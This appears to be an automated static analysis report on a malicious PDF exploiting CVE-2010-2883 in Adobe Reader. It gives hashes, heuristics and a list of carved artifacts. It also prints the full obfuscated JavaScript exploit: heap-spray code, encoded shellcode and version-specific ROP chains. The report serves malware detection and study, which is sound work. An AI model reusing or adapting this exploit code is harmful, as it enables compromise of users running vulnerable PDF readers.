Malicious PDF — malware analysis report

Static analysis result for SHA-256 87c2dfc58f5ecc67…

MALICIOUS

PDF

521.1 KB First seen: 2026-05-10
MD5: 0b6d3c245b8eaa57da7e236c20a511e4 SHA-1: 281504940b914705f958d193f8682163baf4e76a SHA-256: 87c2dfc58f5ecc67280cbc5660eade4543f8dcf0340b39b2988bd2491c9301eb
166 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF contains embedded JavaScript and utilizes the CVE-2010-2883 exploit targeting Adobe Reader's CoolType SING font parsing. The JavaScript is obfuscated but uses `unescape` and appears to construct a URL, likely for downloading a secondary payload. The presence of XFA forms and AcroForm buttons suggests interactive elements designed to trigger the exploit.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9937

Heuristics 9

  • Adobe Reader CoolType SING font exploit — CVE-2010-2883 critical CVE likely CVE_2010_2883
    PDF embeds a TrueType/OpenType font with an actual SING table and pairs it with JavaScript heap-spray shellcode. This matches the public Adobe Reader CoolType SING exploit shape for CVE-2010-2883.
  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • PDF differential parser failed info PDF_DIFFERENTIAL_PARSE_FAILED
    The cross-check parser (pdfminer.six) failed on this file: PDF differential parser failed: AssertionError. Static heuristics still ran and any of their findings above are valid; only the differential cross-check signal is missing.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xfa/promoted-desc/In PDF document text
    • http://ns.adobe.com/xdp/In PDF document text
    • http://www.xfa.org/schema/xci/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-locale-set/2.7/In PDF document text
    • http://www.xfa.org/schema/xfa-locale-set/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-form/2.8/In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0/In PDF document text

Extracted artifacts 7

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0026_000.js pdf-javascript-stream PDF /JS object 26 at offset 0x47BF 9663 bytes
SHA-256: 1a5d1977beaa0cc0b6451de1d06695d971caaa74dae808216ea03238c520bffa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var Juaidai = 12;
var Tolbqnpp = "";

function Vnyhayduv(Gklcbtj,times){
 Ipugpqlbvtw = ""
 var Otdwcwgpeznj;
 var Juaidai = 723;
 for (Otdwcwgpeznj=0;Otdwcwgpeznj<times;Otdwcwgpeznj++){
 Juaidai = 1;
 Ipugpqlbvtw = Ipugpqlbvtw + Gklcbtj;
 }
 return Ipugpqlbvtw;
}

function Oovachwigu(Jxapyyyksdkd){
 var Juaidai = 12;
 return unescape(Jxapyyyksdkd);
}


var Pimfmtggbh = Tolbqnpp+"&%!".charAt(1)+Tolbqnpp;
Pimfmtggbh = Tolbqnpp + Pimfmtggbh + Tolbqnpp+"u"+Tolbqnpp;
Vbiiclkvlyyl = "M01ebM75ebM7403Me801M39ebMb801M0000M12ebM4405M5510Mb8edM1044M0040Mefe9MffffMebffMe801M8b5eM830eM04c6Mfe8bM1c8bMac0eM0375M0174Mc0e8M06c8M0375M0174M32e8Maac3M7449Meb17MfceaMc933M01ebMbe02M00ebM0000Me890Mffb7MffffM0564M0000M5cebMde85Mb885Mbe7fM6abeM6b2bMd75eM40bfM4141Mc4beMbf41MbebeMef5dM5c87M87efMdfdcM8080M4141Mb684MbebfM41beMb5dbM4140Mdc41Ma1dfM4140M5e41Ma3d7M4140Mbe41Mfd44Mdf5cM40a3M4141MdcaeMa3dfM4140Mde41Ma3d1M4140Mbe41Mbe3eMe1beM5ea0Mbfd1M4140Mbe41Mb8a3Mdf5cM40a1M4141M537dM5ebeM3680M3ce3Mdf5cM40a1M4141M5e27Mbeb6Mdf5cM40a1M4141M537dM5ebeMb680M33e3Mdf5cM40a1M4141M537dM3eaeM805eMe336M5c77Ma1dfM4140M5e41Mbf8eMdfdcM40baM4141Mdf5cM40baM4141MdfdcM40a1M4141Mdf4fM40bfM4141MbefeMbebeM3d44Mdf5cM40a1M4141MaeaeMdfdcM40a1M4141M65c4M4141Mdd41M9bdfM41c1Maa41Mbfa4MbefeM41beMb3dbM4140Mdc41M99efMdfddMc19bM4141MddaaM81dfM4180Maa41Mdb41M40b0M4141Mef5cM2799M9f4fM81efM4180Mf541M5cbeM99efM5e27Mef97M8001M4141M24beMddbeM81dfM4180Maa41Md341M40baM4141Mdb41M40b1M4141Mbe24M9ea4MbebeM24beM247eM24beMa47eMbebeM8ebeMdfddM8081M4141M41aaMb2dbM4140Mdc41MbfdfM4140M2441M24beM24beM24beM24bcM41beMbfd3M4140M4141Mb7dbM4140Mdc41M83dfM4180M2441M24beM24beM24beM41feM83d3M4180M4141Mb4dbM4140Mdc41M9edfM4140Mdd41M9bdfM41c1Maa41MdfddM8081M4141M41aaMb0dbM4140M5c41M99efM4f27Mef9fM8081M4141Mbe21Mef5cM2799M975eM01efM4180Mbe41Mbe24M9ea4MbebeM24beM243eM24beMa47eMbebeMaebeMdfddM8081M4141M41aaMb2dbM4140Mdc41MbcdfM4140M2441M41beMbfd3M4140M4141Mb6dbM4140Mdc41M85efMef5cM5c85M9eddM4140Mdd41MfeafMdc8bM80dfM4180M5c41M80dfM4180M5c41Mb9aeMdfdcM40bbM4141Mdf5cM8080M4141Mae5cMdcb6M85efMdf5cM8080M4141Mbe5cMdfdcMc19dM4141Mdf1cMc19dM4141Mdf9cM40bdM4141Mdf5cM409eM4141Mdf7eM40bbM4141MdfdcMc19aM4141Md75eM40a0M4141M44beM5cfdMa0dfM4140Mae41MdfdcM40a0M4141Mdf5cM40a0M4141Mef70M7d85M1e5eMbebeM5cbeM9adfM41c1M1c41M9cbeMb8dfM4140M7d41Mdf13M40b8M4141M8edfM6ba3M137dMb8dfM4140Mf141Mbe41MbebeMeca3M137dMb8dfM4140M7d41Mdd13M40bdM4141Mce72Mdf9cM40b8M4141M137dMb8dfM4140Mdf41Ma38eM7db4Mdf13M40b8M4141M41f1MbebeMa3beM5c38M9adfM41c1M7d41Mbe13M137dMbdddM4140M7241M5cceM9addM41c1M9c41M5cfeM9adfM41c1Mae41MdfdcMc19aM4141M26c4M4141M2441MddbeM9ddfM41c1Maa41Me341M5c85M9edfM4140M7e41MbbdfM4140Maa41Md341M40bcM4141Mdb41M40aaM4141Md341M40bcM4141Mdb41M40adM4141Md341M409eM4141Mdb41M40aeM4141Md341M8083M4141Mdb41M40adM4141Md341M40bfM4141Mdb41M40adM4141Me75eMbe96Mba24M72e8Mdd8eM97e1M5442Me75eMbe82M8e72Me1ddM5483M5454Mef4fMaf96MbebeM4fbeM8defMbefeMbebeM5e27M8ae7M9ebeMb9d7M4140Mbe41M8e72Md1ddM40f9M4141M9e14M84e7M72beMdd8eMc4e1Mdd14Mb9dfM4140Mdc41M9edfM4140M5c41M9edfM4140M0f41Mb6beMdf5cM409eM4141Ma69eMbefeMdf5cM409eM4141Ma69eMbe3eMdf5cM409eM4141Ma69eMbe7eMefddMdc84M9edfM4140M5c41M9edfM4140M0f41M36beMdf5cM409eM4141Ma69eMbefeMdf5cM409eM4141Ma69eMbe3eMdf5cM409eM4141Ma69eMbe7eMefddMaa84MdfddM409fM4141M41aaMb0dbM4140M4141Mbad3M4140Mdd41M9fdfM4140Maa41Mdb41M40a7M4141MefddMaa84MdfddM409fM4141M41aaMa7dbM4140Mdd41M82efMddaaM96efM24aaM24beM24beM24beM24beM24beMddbeM9fdfM4140Maa41MdfddM8081M4141M41aaMa9dbM4140M2441M41beMa6dbM4140M5e41Ma2d7M4140Mbe41Mfd44Mdf5cM40a2M4141MdcaeMa2dfM4140M5e41Ma2d1M4140M3a41Mdd7dMbe97MbebeMdf5cM8080M4141Mbe5cMdfdcM8084M4141Mdf5cM40a2M4141M9fddMb6dfM4140Mdc41M85dfM4180M5e41M82d7M4180Mbe41Ma7a6Mfb5cMbeb2MbebeM2e5cM5cbdMb9a2M5cd5Mbca0M6f5cM5cb1M7fabM7ea0Mdc4bM82dbM4180M5c41Mb628M497eMcc72M5ceeM5cb3M437eM7dd8M3f11M8f30Mbca3M0cceM7e7fM2f8aMc244Mdb70M8084M4141M06e3Mdb5cM8082M4141M285cM7eb7M2749Mbd5cM5c6cMb928M497eMbf5cM7e5cM5c4fM85d9M4180Mdc41Me67eMdf5cM8080M4141M8e5eMdcbfM80dfM4180Mc441M412eM4141Mbbc4M4140M4441M8401M0081M4141M7a1dM953cMf888Mfe6cM82e1M18d7M5fd2Mc75cM32d4M9b87M066dM5ee1M791fM9ad0M7d4fM7f44M012aM0857Ma3acMbddaM49dfM5055M276bM41fdMdd8fMa379M3312M7a7dM116eM4895M9149M6417Mdc66M6dcaM791fM1fe1M00faM0000" ;

var Enchfcuvtwn = (app.viewerVersion / 10.0);
Vbiiclkvlyyl = Vbiiclkvlyyl.replace(/M/g,Pimfmtggbh);
var Ycjygwhscgnv = this;
Vbiiclkvlyyl = Oovachwigu(Vbiiclkvlyyl);

function Htbcdm(Vbiiclkvlyyl,Bzubmlxlbf,Bkesxwjtsb){
 var Olalun = 1024;
 
 var Saqytin = Vnyhayduv(Bzubmlxlbf,Olalun);
 var Uipcwelcwl = Vnyhayduv(Bzubmlxlbf,Olalun-(Vbiiclkvlyyl.length/2))+Vbiiclkvlyyl;
 
 var FvzlbcjckcfOfFirstEntry = Vnyhayduv(Bzubmlxlbf,Olalun-18);
 var FvzlbcjckcfOfOtherEntry = Vnyhayduv(Bzubmlxlbf,Olalun-11);

 var Vxcuul = [];
 for( Otdwcwgpeznj = 0; Otdwcwgpeznj < 16-2; Otdwcwgpeznj++ ){
 Vxcuul.push( Saqytin );
 }
 Vxcuul.push(Uipcwelcwl);
 var Lvxgmunsmebw = Vxcuul.join("");

 Ycjygwhscgnv.Hpedba = new Array();
 var Wafaue = 0;
 for( Otdwcwgpeznj = 0; Otdwcwgpeznj < Bkesxwjtsb; Otdwcwgpeznj++ ){
 if (Otdwcwgpeznj == 0){
 Ycjygwhscgnv.Hpedba[Otdwcwgpeznj] = FvzlbcjckcfOfFirstEntry+Lvxgmunsmebw;
 } else{
 Ycjygwhscgnv.Hpedba[Otdwcwgpeznj] = FvzlbcjckcfOfOtherEntry+Lvxgmunsmebw;
 }
 }
}


Uzwnncyhd = "M4142M4241";
Uzwnncyhd = Uzwnncyhd.replace(/M/g,Pimfmtggbh);
Uzwnncyhd = Oovachwigu(Uzwnncyhd);


if ( app.platform == "WIN" ){ 
 if ( Enchfcuvtwn <= 0.5999 ) {
 app.alert("Please update your PDF viewer software.");
 } else if ( Enchfcuvtwn <= 0.6999999999 ) {
 global.Mvckuabj = Vnyhayduv(Uzwnncyhd,500)+Vbiiclkvlyyl;
 Ycjygwhscgnv.pageNum = 11;
 } else if ( Enchfcuvtwn <= 0.7999999999 ) {
 global.Mvckuabj = Vnyhayduv(Uzwnncyhd,500)+Vbiiclkvlyyl;
 Ycjygwhscgnv.pageNum = 12; 
 } else if ( Enchfcuvtwn <= 0.8999999999 ) {
 Lfobubh = "";
Lfobubh = Lfobubh +"M17f2M4a82M5000M4a84M630fM4a80M7ec9M4a";
Lfobubh = Lfobubh +"81M203cM4a82M57bcM4a80M156aM4a82M54e0M";
Lfobubh = Lfobubh +"4a82M0000M1000M0000M0000M0000M0000M000";
Lfobubh = Lfobubh +"2M0000M0102M0000M0000M0000M17f2M4a82M1";
Lfobubh = Lfobubh +"56aM4a82Mfe83M4a81Me982M4a81M0008M0000";
Lfobubh = Lfobubh +"M597dM4a80M7ec9M4a81M2038M4a82M57bcM4a";
Lfobubh = Lfobubh +"80M156aM4a82MffffMffffM0000M0000M0040M";
Lfobubh = Lfobubh +"0000M0000M0000M0000M0001M0000M0000M17f";
Lfobubh = Lfobubh +"2M4a82M156aM4a82Mfe83M4a81Me982M4a81M0";
Lfobubh = Lfobubh +"008M0000M597dM4a80M7ec9M4a81M2030M4a82";
Lfobubh = Lfobubh +"M57bcM4a80M156aM4a82MffffMffffM0022M00";
Lfobubh = Lfobubh +"00M0000M0000M0000M0000M0000M0001M17f2M";
Lfobubh = Lfobubh +"4a82M5004M4a84M630fM4a80M17f2M4a82M156";
Lfobubh = Lfobubh +"aM4a82Mfe83M4a81Me982M4a81M0030M0000M5";
Lfobubh = Lfobubh +"97dM4a80M7ec9M4a81M5004M4a84Ma649M4a81";
Lfobubh = Lfobubh +"M17f2M4a82M156aM4a82Mfe83M4a81Me982M4a";
Lfobubh = Lfobubh +"81M0020M0000M597dM4a80M17f2M4a82M156aM";
Lfobubh = Lfobubh +"4a82M00a0M4a82M7ec9M4a81M0034M0000M795";
Lfobubh = Lfobubh +"aM4a80M17f2M4a82M156aM4a82Mfe83M4a81Me";
Lfobubh = Lfobubh +"982M4a81M000aM0000M597dM4a80M7ec9M4a81";
Lfobubh = Lfobubh +"M2140M4a82M57bcM4a80MffffMffffMffffMff";
Lfobubh = Lfobubh +"ffMffffMffffM1000M0000M258bM5000M4a84M";
Lfobubh = Lfobubh +"4d4d";

 Lfobubh = Lfobubh.replace(/M/g,Pimfmtggbh);
 Lfobubh = Oovachwigu(Lfobubh);
 Djcxdzbvuhef = "";
Djcxdzbvuhef = Djcxdzbvuhef +"M12c4M4a80";

 Djcxdzbvuhef = Djcxdzbvuhef.replace(/M/g,Pimfmtggbh);
 Djcxdzbvuhef = Oovachwigu(Djcxdzbvuhef);
 
 Htbcdm(Lfobubh + Vbiiclkvlyyl,Djcxdzbvuhef,2000);
 Ycjygwhscgnv.pageNum = 13;
 } else if ( Enchfcuvtwn <= 0.9999999999 ) {
 Nircgsipef = "";
Nircgsipef = Nircgsipef +"M63a5M4a80M0000M4a8aM2196M4";
Nircgsipef = Nircgsipef +"a80M1f90M4a80M903cM4a84Mb69";
Nircgsipef = Nircgsipef +"2M4a80M1064M4a80M22c8M4a85M";
Nircgsipef = Nircgsipef +"0000M1000M0000M0000M0000M00";
Nircgsipef = Nircgsipef +"00M0002M0000M0102M0000M0000";
Nircgsipef = Nircgsipef +"M0000M63a5M4a80M1064M4a80M2";
Nircgsipef = Nircgsipef +"db2M4a84M2ab1M4a80M0008M000";
Nircgsipef = Nircgsipef +"0Ma8a6M4a80M1f90M4a80M9038M";
Nircgsipef = Nircgsipef +"4a84Mb692M4a80M1064M4a80Mff";
Nircgsipef = Nircgsipef +"ffMffffM0000M0000M0040M0000";
Nircgsipef = Nircgsipef +"M0000M0000M0000M0001M0000M0";
Nircgsipef = Nircgsipef +"000M63a5M4a80M1064M4a80M2db";
Nircgsipef = Nircgsipef +"2M4a84M2ab1M4a80M0008M0000M";
Nircgsipef = Nircgsipef +"a8a6M4a80M1f90M4a80M9030M4a";
Nircgsipef = Nircgsipef +"84Mb692M4a80M1064M4a80Mffff";
Nircgsipef = Nircgsipef +"MffffM0022M0000M0000M0000M0";
Nircgsipef = Nircgsipef +"000M0000M0000M0001M63a5M4a8";
Nircgsipef = Nircgsipef +"0M0004M4a8aM2196M4a80M63a5M";
Nircgsipef = Nircgsipef +"4a80M1064M4a80M2db2M4a84M2a";
Nircgsipef = Nircgsipef +"b1M4a80M0030M0000Ma8a6M4a80";
Nircgsipef = Nircgsipef +"M1f90M4a80M0004M4a8aMa7d8M4";
Nircgsipef = Nircgsipef +"a80M63a5M4a80M1064M4a80M2db";
Nircgsipef = Nircgsipef +"2M4a84M2ab1M4a80M0020M0000M";
Nircgsipef = Nircgsipef +"a8a6M4a80M63a5M4a80M1064M4a";
Nircgsipef = Nircgsipef +"80MaedcM4a80M1f90M4a80M0034";
Nircgsipef = Nircgsipef +"M0000Md585M4a80M63a5M4a80M1";
Nircgsipef = Nircgsipef +"064M4a80M2db2M4a84M2ab1M4a8";
Nircgsipef = Nircgsipef +"0M000aM0000Ma8a6M4a80M1f90M";
Nircgsipef = Nircgsipef +"4a80M9170M4a84Mb692M4a80Mff";
Nircgsipef = Nircgsipef +"ffMffffMffffMffffMffffMffff";
Nircgsipef = Nircgsipef +"M1000M0000M258bM0000M4a8aM4";
Nircgsipef = Nircgsipef +"d4d";

 Nircgsipef = Nircgsipef.replace(/M/g,Pimfmtggbh);
 Nircgsipef = Oovachwigu(Nircgsipef);
 Zxwhjjr = "";
Zxwhjjr = Zxwhjjr +"M1064M4a80";

 Zxwhjjr = Zxwhjjr.replace(/M/g,Pimfmtggbh);
 Zxwhjjr = Oovachwigu(Zxwhjjr);
 
 Htbcdm(Nircgsipef + Vbiiclkvlyyl,Zxwhjjr,2000);
 Ycjygwhscgnv.pageNum = 14;
 } else{
 app.alert("Please update your PDF viewer software.");
 }
}else{
 app.alert("Please update your PDF viewer software.");
}
font_00_cff_off00003a54.bin pdf-font-stream PDF embedded font (cff) at offset 0x3A54 1138 bytes
SHA-256: ea8f409c7366ed46eeb553aa7b404f04641f482ba88463fbe253da60be5787e5
font_01_sfnt_off000070c8.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x70C8 8084 bytes
SHA-256: e31f8c8507e52f29008d946a00becde9f839e34cb108985ce66167bf881adafa
font_11_sfnt_off000149fa.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x149FA 65932 bytes
SHA-256: 422bc5698ba5d9d4818f6a2d8b3abca2f723e713b44a15c390139d2c976a1388
font_12_sfnt_off0001e85c.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x1E85C 65932 bytes
SHA-256: 7e24ee16c8b09ee74d61445f29c3c0a95abfdf17fc1008606394f159dbd0c106
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)
font_13_sfnt_off000286ba.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x286BA 65932 bytes
SHA-256: 57e24925bc6bdb98d38e8b4ba3b87f80f75c5e49ea9a522486790d7dc6848549
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)
font_14_sfnt_off000324e1.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x324E1 65932 bytes
SHA-256: 1f068d668b316fcb46f0801be00137fb749cc7fda5ca15e442829d6c303d8f99
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.